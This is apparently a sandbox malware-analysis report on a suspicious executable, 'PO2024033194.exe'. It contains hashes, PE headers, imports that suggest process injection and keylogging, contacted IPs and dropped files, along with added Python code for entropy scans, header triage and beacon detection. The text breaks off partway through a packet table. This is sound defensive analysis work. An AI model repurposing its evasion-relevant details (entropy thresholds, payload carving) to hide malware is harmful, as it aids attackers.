                                                                Preview:t.p..N2UE.._..m.CR....O=...2UEQPKVDMESQ7CQ7159L5IDN2UEQPK.DME]N.MQ.8...4..of=,"p;$+*72<. 0Y_ZMlW,d<G;e8>k...e>>S&.:<?.L5IDN2U<PY.k$*.n1P.lWV.#.~.U._...j$*.I...mWV.k%V!y.U.EQPKVDME..7C.605....DN2UEQPK.DODXP<CQg559L5IDN2U.DPKVTMES13CQ7q59\5IDL2UCQPKVDMEUQ7CQ7159,1IDL2UEQPKTD..SQ'CQ'159L%ID^2UEQPKFDMESQ7CQ7159L5IDN2UEQPKVDMESQ7CQ7159L5IDN2UEQPKVDMESQ7CQ7159L5IDN2UEQPKVDMESQ7CQ7159L5IDN2UEQPKVDMESQ7CQ7159L5IDN2UEQPKVDMESQ7CQ715.8P10N2U..TKVTMES.3CQ'159L5IDN2UEQPKvDM%SQ7CQ7159L5IDN2UEQPKVDMESQ7CQ7159L5IDN2UEQPKVDMESQ7CQ7159L5IDN2UEQPKVDMESQ7CQ7159L5IDN2UEQPKVDMESQ7CQ7159L5IDN2UEQPKVDMESQ7CQ7159L5IDN2UEQPKVDMESQ7CQ7159L5IDN2UEQPKVDMESQ7CQ7159L5IDN2UEQPKVDMESQ7CQ7159L5IDN2UEQPKVDMESQ7CQ7159L5IDN2UEQPKVDMESQ7CQ7159L5IDN2UEQPKVDMESQ7CQ7159L5IDN2UEQPKVDMESQ7CQ7159L5IDN2UEQPKVDMESQ7CQ7159L5IDN2UEQPKVDMESQ7CQ7159L5IDN2UEQPKVDMESQ7CQ7159L5IDN2UEQPKVDMESQ7CQ7159L5IDN2UEQPKVDMESQ7CQ7159L5IDN2UEQPKVDMESQ7CQ7159L5IDN2UEQPKVDMESQ7CQ7159L5IDN2UEQPKVDMESQ7CQ7159L5IDN2UEQPKVDMESQ7CQ7159L5IDN2UEQPKVDME
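The two dropped files above are told apart mainly by their 8-bit entropy: 1.12 for the mostly empty SQLite database (Encrypted: false) against 7.99 for the 287232-byte blob written by PO2024033194.exe (Encrypted: true). The following is an added example, not Joe Sandbox code, showing how that byte-level Shannon entropy is computed and how a sliding-window scan locates the dense region inside a larger carrier file, which a single whole-file score such as the 7.57 of the PE cannot do. The 7.9 cutoff, the window size and the inputs are assumptions: the report does not state its own threshold, and the sample buffers are constructed in-line, not the real files.

```python
"""Byte-level Shannon entropy (the metric behind "Entropy (8bit)") and a
sliding-window scan for high-entropy regions.

Added example, not Joe Sandbox code. The 7.9 cutoff is an assumption chosen
to separate the two dropped files in the report (1.12 vs 7.99); the report
does not state its own threshold. All inputs below are constructed.
"""
import math
import random
from collections import Counter


def shannon_entropy(data: bytes) -> float:
    """Entropy in bits per byte: 0.0 for a constant buffer, 8.0 for uniform."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


ENCRYPTED_CUTOFF = 7.9  # assumed cutoff, see module docstring


def looks_encrypted(data: bytes, cutoff: float = ENCRYPTED_CUTOFF) -> bool:
    """Whole-buffer verdict in the spirit of the report's Encrypted field."""
    return shannon_entropy(data) >= cutoff


def high_entropy_regions(data: bytes, window: int = 4096,
                         cutoff: float = ENCRYPTED_CUTOFF):
    """Score fixed-size windows and merge adjacent ones above the cutoff.

    Returns a list of (offset, length) tuples with window granularity, so a
    payload that ends mid-window is reported slightly short. A whole-file
    score can average a packed blob against plain code; per-window scores
    show where the dense bytes actually sit.
    """
    regions = []
    start = None
    for off in range(0, len(data), window):
        hot = shannon_entropy(data[off:off + window]) >= cutoff
        if hot and start is None:
            start = off
        elif not hot and start is not None:
            regions.append((start, off - start))
            start = None
    if start is not None:
        regions.append((start, len(data) - start))
    return regions


def constructed_sqlite_like(size: int = 196608) -> bytes:
    """Zero-filled pages behind a short text header: low entropy, standing in
    for the dropped browser database (constructed, not the real file)."""
    header = b"SQLite format 3\x00" + \
        b"CREATE TABLE logins(url TEXT, user TEXT, pass BLOB);" * 8
    return header.ljust(size, b"\x00")


def constructed_encrypted_payload(size: int = 287232, seed: int = 1) -> bytes:
    """Deterministic pseudo-random bytes standing in for an encrypted payload
    of the same size as the second dropped file (constructed)."""
    rng = random.Random(seed)
    return rng.getrandbits(8 * size).to_bytes(size, "big")


def constructed_carrier(payload: bytes) -> bytes:
    """Low-entropy padding around the payload, embedded at offset 8192."""
    prefix = b"MZ" + b"\x00" * 8190
    suffix = b"This program cannot be run in DOS mode.\r\n" * 200
    return prefix + payload + suffix


if __name__ == "__main__":
    db = constructed_sqlite_like()
    blob = constructed_encrypted_payload()
    print(f"database : {shannon_entropy(db):.4f}  encrypted={looks_encrypted(db)}")
    print(f"payload  : {shannon_entropy(blob):.4f}  encrypted={looks_encrypted(blob)}")
    print("regions  :", high_entropy_regions(constructed_carrier(blob)))
```

Run against a real dropped file by replacing the constructed buffers with `open(path, "rb").read()`. The window scan is the part worth keeping: a loader that stores its payload in a resource or overlay can score well below the cutoff as a whole while one contiguous run of windows sits at 7.95 or above, and that run's offset is where to start carving.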
                                                                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                Entropy (8bit):7.567744163701219
                                                                TrID:
                                                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                                • DOS Executable Generic (2002/1) 0.02%
                                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                File name:PO2024033194.exe
                                                                File size:1'415'239 bytes
                                                                MD5:1eebf0360b466749cd46f9d7971c35cd
                                                                SHA1:563fe4fd1b3ff569adfe99ad15791e78a09c486f
                                                                SHA256:59965600d8885fbd982a88ecf800b6a8cf6714fff11fcbe5123a7fc72781cf23
                                                                SHA512:506595431d183b1448440139f172a6ba4882bad7b938bb77286f8cf27d370523839572406734c85d64db047f67d42f981ff93645847cec95667e7dbbcac11111
                                                                SSDEEP:24576:uRmJkcoQricOIQxiZY1iaCyZhLtqvcucW6WdJfDqbtfnZjr5jgs5:7JZoQrbTFZY1iaCyjLtacq6W3ubtfZnf
                                                                TLSH:5165F122B5C69076C1F323B19E7EF76A963D69360336D2DB37C81E211EA05512B39723
                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........................1b.......P.).....Q.......y.......i..........}....N.......d.......`.......m.......g.....Rich............PE..L..
                                                                Icon Hash:1733312925935517
                                                                Entrypoint:0x4165c1
                                                                Entrypoint Section:.text
                                                                Digitally signed:false
                                                                Imagebase:0x400000
                                                                Subsystem:windows gui
                                                                Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                Time Stamp:0x4F25BAEC [Sun Jan 29 21:32:28 2012 UTC]
                                                                TLS Callbacks:
                                                                CLR (.Net) Version:
                                                                OS Version Major:5
                                                                OS Version Minor:0
                                                                File Version Major:5
                                                                File Version Minor:0
                                                                Subsystem Version Major:5
                                                                Subsystem Version Minor:0
                                                                Import Hash:d3bf8a7746a8d1ee8f6e5960c3f69378
                                                                Instruction
                                                                call 00007FC10C80EC6Bh
                                                                jmp 00007FC10C805ADEh
                                                                int3
                                                                int3
                                                                int3
                                                                int3
                                                                int3
                                                                push ebp
                                                                mov ebp, esp
                                                                push edi
                                                                push esi
                                                                mov esi, dword ptr [ebp+0Ch]
                                                                mov ecx, dword ptr [ebp+10h]
                                                                mov edi, dword ptr [ebp+08h]
                                                                mov eax, ecx
                                                                mov edx, ecx
                                                                add eax, esi
                                                                cmp edi, esi
                                                                jbe 00007FC10C805C5Ah
                                                                cmp edi, eax
                                                                jc 00007FC10C805DF6h
                                                                cmp ecx, 00000080h
                                                                jc 00007FC10C805C6Eh
                                                                cmp dword ptr [004A9724h], 00000000h
                                                                je 00007FC10C805C65h
                                                                push edi
                                                                push esi
                                                                and edi, 0Fh
                                                                and esi, 0Fh
                                                                cmp edi, esi
                                                                pop esi
                                                                pop edi
                                                                jne 00007FC10C805C57h
                                                                jmp 00007FC10C806032h
                                                                test edi, 00000003h
                                                                jne 00007FC10C805C66h
                                                                shr ecx, 02h
                                                                and edx, 03h
                                                                cmp ecx, 08h
                                                                jc 00007FC10C805C7Bh
                                                                rep movsd
                                                                jmp dword ptr [00416740h+edx*4]
                                                                mov eax, edi
                                                                mov edx, 00000003h
                                                                sub ecx, 04h
                                                                jc 00007FC10C805C5Eh
                                                                and eax, 03h
                                                                add ecx, eax
                                                                jmp dword ptr [00416654h+eax*4]
                                                                jmp dword ptr [00416750h+ecx*4]
                                                                nop
                                                                jmp dword ptr [004166D4h+ecx*4]
                                                                nop
                                                                inc cx
                                                                add byte ptr [eax-4BFFBE9Ah], dl
                                                                inc cx
                                                                add byte ptr [ebx], ah
                                                                ror dword ptr [edx-75F877FAh], 1
                                                                inc esi
                                                                add dword ptr [eax+468A0147h], ecx
                                                                add al, cl
                                                                jmp 00007FC10EC7E457h
                                                                add esi, 03h
                                                                add edi, 03h
                                                                cmp ecx, 08h
                                                                jc 00007FC10C805C1Eh
                                                                rep movsd
                                                                jmp dword ptr [00000000h+edx*4]
                                                                Programming Language:
                                                                • [ C ] VS2010 SP1 build 40219
                                                                • [C++] VS2010 SP1 build 40219
                                                                • [ C ] VS2008 SP1 build 30729
                                                                • [IMP] VS2008 SP1 build 30729
                                                                • [ASM] VS2010 SP1 build 40219
                                                                • [RES] VS2010 SP1 build 40219
                                                                • [LNK] VS2010 SP1 build 40219
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x8d41c | 0x154 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xab000 | 0x9328 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x82000 | 0x844 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x8061c | 0x80800 | 61ffce4768976fa0dd2a8f6a97b1417a | False | 0.5583182605787937 | data | 6.684690148171278 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x82000 | 0xdfc0 | 0xe000 | 0354bc5f2376b5e9a4a3ba38b682dff1 | False | 0.36085728236607145 | data | 4.799741132252136 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x90000 | 0x1a758 | 0x6800 | 8033f5a38941b4685bc2299e78f31221 | False | 0.15324519230769232 | data | 2.1500715391677487 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0xab000 | 0x9328 | 0x9400 | 495451d7eb8326bd9fa2714869ea6de8 | False | 0.49002322635135137 | data | 5.541804843154628 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
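The header fields and section table above are the raw material for a first static triage pass. The Python below is an added example (mine, not part of the sandbox report) that runs that pass over the values transcribed from the tables: where the entry point lands, which exploit mitigations the PE header opts into, whether any section looks packed, and what the compile timestamp decodes to. The header values are the report's; the thresholds (entropy 7.0, raw size under half the virtual size) are my assumptions.

```python
"""Static triage over the PE header and section values of a sandbox report."""
from datetime import datetime, timezone

# Values transcribed from the report's header and section tables.
IMAGE_BASE = 0x400000
ENTRY_POINT = 0x4165C1            # the report lists the entry point as a VA
TIME_STAMP = 0x4F25BAEC
FILE_CHARACTERISTICS = {"RELOCS_STRIPPED", "EXECUTABLE_IMAGE",
                        "LARGE_ADDRESS_AWARE", "32BIT_MACHINE"}
DLL_CHARACTERISTICS = {"TERMINAL_SERVER_AWARE"}

# (name, virtual address, virtual size, raw size, entropy, characteristics)
SECTIONS = [
    (".text",  0x01000, 0x8061C, 0x80800, 6.68, {"CNT_CODE", "MEM_EXECUTE", "MEM_READ"}),
    (".rdata", 0x82000, 0x0DFC0, 0x0E000, 4.80, {"CNT_INITIALIZED_DATA", "MEM_READ"}),
    (".data",  0x90000, 0x1A758, 0x06800, 2.15, {"CNT_INITIALIZED_DATA", "MEM_READ", "MEM_WRITE"}),
    (".rsrc",  0xAB000, 0x09328, 0x09400, 5.54, {"CNT_INITIALIZED_DATA", "MEM_READ"}),
]

# DllCharacteristics flags a hardened 32-bit binary would carry.
MITIGATIONS = {"DYNAMIC_BASE": "ASLR", "NX_COMPAT": "DEP", "GUARD_CF": "Control Flow Guard"}


def entry_section(sections, entry_va, image_base):
    """Name of the section containing the entry point, or None if it is outside all."""
    rva = entry_va - image_base
    for name, va, vsize, _raw, _entropy, _chars in sections:
        if va <= rva < va + vsize:
            return name
    return None


def missing_mitigations(dll_chars, file_chars):
    """Mitigations the header does not opt into. With RELOCS_STRIPPED the loader
    cannot rebase the image at all, so ASLR would be impossible even if requested."""
    missing = [f"{flag} ({desc})" for flag, desc in MITIGATIONS.items() if flag not in dll_chars]
    if "RELOCS_STRIPPED" in file_chars:
        missing.append("relocations stripped: image is pinned to its preferred base")
    return missing


def section_findings(sections, entry_va, image_base, high_entropy=7.0):
    """Packer-style anomalies: entry point outside a code section or in the last
    section, writable+executable sections, high entropy, and code sections whose
    raw size is far below their virtual size (unpacked-at-runtime space)."""
    findings = []
    ep = entry_section(sections, entry_va, image_base)
    if ep is None:
        findings.append("entry point outside every section")
    else:
        chars = next(s[5] for s in sections if s[0] == ep)
        if "MEM_EXECUTE" not in chars:
            findings.append(f"entry point in non-executable section {ep}")
        if ep == sections[-1][0]:
            findings.append(f"entry point in last section {ep}")
    for name, _va, vsize, raw, entropy, chars in sections:
        if {"MEM_WRITE", "MEM_EXECUTE"} <= chars:
            findings.append(f"{name} is writable and executable")
        if entropy >= high_entropy:
            findings.append(f"{name} entropy {entropy:.2f} suggests packed or encrypted data")
        if "MEM_EXECUTE" in chars and raw < vsize // 2:
            findings.append(f"{name} raw size 0x{raw:x} far below virtual size 0x{vsize:x}")
    return findings


def compile_time(ts):
    """Decode the PE TimeDateStamp (seconds since 1970-01-01 UTC)."""
    return datetime.fromtimestamp(ts, tz=timezone.utc).strftime("%Y-%m-%d %H:%M:%S")


if __name__ == "__main__":
    print("compiled:", compile_time(TIME_STAMP))
    print("entry point section:", entry_section(SECTIONS, ENTRY_POINT, IMAGE_BASE))
    for m in missing_mitigations(DLL_CHARACTERISTICS, FILE_CHARACTERISTICS):
        print("missing:", m)
    for f in section_findings(SECTIONS, ENTRY_POINT, IMAGE_BASE) or ["no section anomalies"]:
        print("section:", f)
```

For this sample the section heuristics come back clean (entry point inside .text, no writable code, entropy below the packing threshold), so the outer executable is not a trivially packed stub. The actionable static result is the mitigation list: the header requests neither ASLR nor DEP, and with relocations stripped the image is fixed at 0x400000, which is why the jump tables in the entry-point disassembly above are addressed absolutely (0x416740, 0x416654, and so on).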
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0xab5c8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors | English | Great Britain | 0.3277027027027027
RT_ICON | 0xab6f0 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.7466216216216216
RT_ICON | 0xab818 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.3885135135135135
RT_ICON | 0xab940 | 0x668 | Device independent bitmap graphic, 48 x 96 x 4, image size 1152 | English | Great Britain | 0.48109756097560974
RT_ICON | 0xabfa8 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 512 | English | Great Britain | 0.5672043010752689
RT_ICON | 0xac290 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128 | English | Great Britain | 0.6418918918918919
RT_ICON | 0xac3b8 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors | English | Great Britain | 0.7044243070362474
RT_ICON | 0xad260 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors | English | Great Britain | 0.8077617328519856
RT_ICON | 0xadb08 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors | English | Great Britain | 0.5903179190751445
RT_ICON | 0xae070 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | English | Great Britain | 0.5503112033195021
RT_ICON | 0xb0618 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | English | Great Britain | 0.6050656660412758
RT_ICON | 0xb16c0 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | English | Great Britain | 0.7553191489361702
RT_MENU | 0xb1b28 | 0x50 | data | English | Great Britain | 0.9
RT_DIALOG | 0xb1b78 | 0xfc | data | English | Great Britain | 0.6507936507936508
RT_STRING | 0xb1c78 | 0x530 | data | English | Great Britain | 0.33960843373493976
RT_STRING | 0xb21a8 | 0x690 | data | English | Great Britain | 0.26964285714285713
RT_STRING | 0xb2838 | 0x4d0 | data | English | Great Britain | 0.36363636363636365
RT_STRING | 0xb2d08 | 0x5fc | data | English | Great Britain | 0.3087467362924282
RT_STRING | 0xb3308 | 0x65c | data | English | Great Britain | 0.34336609336609336
RT_STRING | 0xb3968 | 0x388 | data | English | Great Britain | 0.377212389380531
RT_STRING | 0xb3cf0 | 0x158 | Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0 | English | United States | 0.502906976744186
RT_GROUP_ICON | 0xb3e48 | 0x84 | data | English | Great Britain | 0.6439393939393939
RT_GROUP_ICON | 0xb3ed0 | 0x14 | data | English | Great Britain | 1.15
RT_GROUP_ICON | 0xb3ee8 | 0x14 | data | English | Great Britain | 1.25
RT_GROUP_ICON | 0xb3f00 | 0x14 | data | English | Great Britain | 1.25
RT_VERSION | 0xb3f18 | 0x19c | data | English | Great Britain | 0.5339805825242718
RT_MANIFEST | 0xb40b8 | 0x26c | ASCII text, with CRLF line terminators | English | United States | 0.5145161290322581
DLL | Imports
WSOCK32.dll | __WSAFDIsSet, setsockopt, ntohs, recvfrom, sendto, htons, select, listen, WSAStartup, bind, closesocket, connect, socket, send, WSACleanup, ioctlsocket, accept, WSAGetLastError, inet_addr, gethostbyname, gethostname, recv
VERSION.dll | VerQueryValueW, GetFileVersionInfoW, GetFileVersionInfoSizeW
WINMM.dll | timeGetTime, waveOutSetVolume, mciSendStringW
COMCTL32.dll | ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, ImageList_ReplaceIcon, ImageList_Create, InitCommonControlsEx, ImageList_Destroy
MPR.dll | WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W, WNetUseConnectionW
WININET.dll | InternetReadFile, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetConnectW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetQueryOptionW, InternetQueryDataAvailable
PSAPI.DLL | EnumProcesses, GetModuleBaseNameW, GetProcessMemoryInfo, EnumProcessModules
USERENV.dll | CreateEnvironmentBlock, DestroyEnvironmentBlock, UnloadUserProfile, LoadUserProfileW
KERNEL32.dll | HeapAlloc, Sleep, GetCurrentThreadId, RaiseException, MulDiv, GetVersionExW, GetSystemInfo, InterlockedIncrement, InterlockedDecrement, WideCharToMultiByte, lstrcpyW, MultiByteToWideChar, lstrlenW, lstrcmpiW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, DeleteFileW, FindNextFileW, MoveFileW, CopyFileW, CreateDirectoryW, RemoveDirectoryW, GetProcessHeap, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetLocalTime, CompareStringW, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionAndSpinCount, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, GetTempPathW, GetTempFileNameW, VirtualFree, FormatMessageW, GetExitCodeProcess, SetErrorMode, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, DeviceIoControl, SetFileAttributesW, GetShortPathNameW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetCurrentThread, GetProcessIoCounters, CreateProcessW, SetPriorityClass, LoadLibraryW, VirtualAlloc, LoadLibraryExW, HeapFree, WaitForSingleObject, CreateThread, DuplicateHandle, GetLastError, CloseHandle, GetCurrentProcess, GetProcAddress, LoadLibraryA, FreeLibrary, GetModuleFileNameW, GetFullPathNameW, SetCurrentDirectoryW, IsDebuggerPresent, GetCurrentDirectoryW, ExitProcess, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetTimeFormatW, GetDateFormatW, GetCommandLineW, GetStartupInfoW, IsProcessorFeaturePresent, HeapSize, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStringTypeW, HeapCreate, SetHandleCount, GetFileType, SetStdHandle, GetConsoleCP, GetConsoleMode, LCMapStringW, RtlUnwind, SetFilePointer, GetTimeZoneInformation, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetTickCount, HeapReAlloc, WriteConsoleW, SetEndOfFile, SetSystemPowerState, SetEnvironmentVariableA
USER32.dll | GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, ReleaseCapture, SetCapture, WindowFromPoint, LoadImageW, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, CheckMenuRadioItem, SetWindowPos, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, SystemParametersInfoW, TranslateMessage, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, GetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, MessageBoxW, DefWindowProcW, CopyImage, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, GetMenuItemID, DispatchMessageW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, PeekMessageW, UnregisterHotKey, CharLowerBuffW, keybd_event, MonitorFromRect, GetWindowThreadProcessId
GDI32.dll | DeleteObject, AngleArc, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, StrokePath, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, GetDeviceCaps, MoveToEx, DeleteDC, GetPixel, CreateDCW, Ellipse, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, GetStockObject, LineTo
COMDLG32.dll | GetSaveFileNameW, GetOpenFileNameW
ADVAPI32.dll | RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegCreateKeyExW, GetUserNameW, RegConnectRegistryW, CloseServiceHandle, UnlockServiceDatabase, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, InitializeSecurityDescriptor, InitializeAcl, GetLengthSid, CopySid, LogonUserW, LockServiceDatabase, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, GetAce, AddAce, SetSecurityDescriptorDacl, RegOpenKeyExW, RegQueryValueExW, AdjustTokenPrivileges, InitiateSystemShutdownExW, OpenSCManagerW, RegCloseKey
SHELL32.dll | DragQueryPoint, ShellExecuteExW, SHGetFolderPathW, DragQueryFileW, SHEmptyRecycleBinW, SHBrowseForFolderW, SHFileOperationW, SHGetPathFromIDListW, SHGetDesktopFolder, SHGetMalloc, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
ole32.dll | OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CLSIDFromString, StringFromGUID2, CoInitialize, CoUninitialize, CoCreateInstance, CreateStreamOnHGlobal, CoTaskMemAlloc, CoTaskMemFree, ProgIDFromCLSID, OleInitialize, CreateBindCtx, CLSIDFromProgID, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket, OleUninitialize, IIDFromString
OLEAUT32.dll | VariantChangeType, VariantCopyInd, DispCallFunc, CreateStdDispatch, CreateDispTypeInfo, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SysStringLen, SafeArrayAllocData, GetActiveObject, QueryPathOfRegTypeLib, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, SysAllocString, VariantCopy, VariantClear, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, OleLoadPicture, SafeArrayAccessData, VariantInit
Language of compilation system | Country where language is spoken | Map
English | Great Britain |
English | United States |
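The TCP packet table that follows lists each packet the sandbox captured with its timestamp, ports and endpoints, but the per-packet view hides the shape of the traffic. The Python below is an added example (mine, not part of the sandbox report) that groups the rows of that table into client-to-server flows and measures the spacing between successive connections to the same server, the basic check for beacon-like check-ins. The packet rows are transcribed from the report's table (the table stops after the first packets of the 85.159.66.93 connection, so that flow is truncated here too); the beacon thresholds, at least three connections with interval jitter under 10 percent, are my assumptions.

```python
"""Flow summary and beacon-interval check over a sandbox TCP packet table."""
from collections import defaultdict
from statistics import mean, pstdev

# Endpoints as they appear in the report. The analysis VM is 192.168.2.6.
H = "192.168.2.6"        # sandbox host
A = "172.81.61.224"
B = "81.2.196.19"
C = "85.159.66.93"

# (timestamp, source port, dest port, source IP, dest IP), transcribed from the
# report's packet table (Sep 22, 2024, CEST).
PACKETS = [
    ("17:41:04.086803913", 49718, 80, H, A), ("17:41:04.091708899", 80, 49718, A, H),
    ("17:41:04.091821909", 49718, 80, H, A), ("17:41:04.101147890", 49718, 80, H, A),
    ("17:41:04.106101036", 80, 49718, A, H), ("17:41:04.719127893", 80, 49718, A, H),
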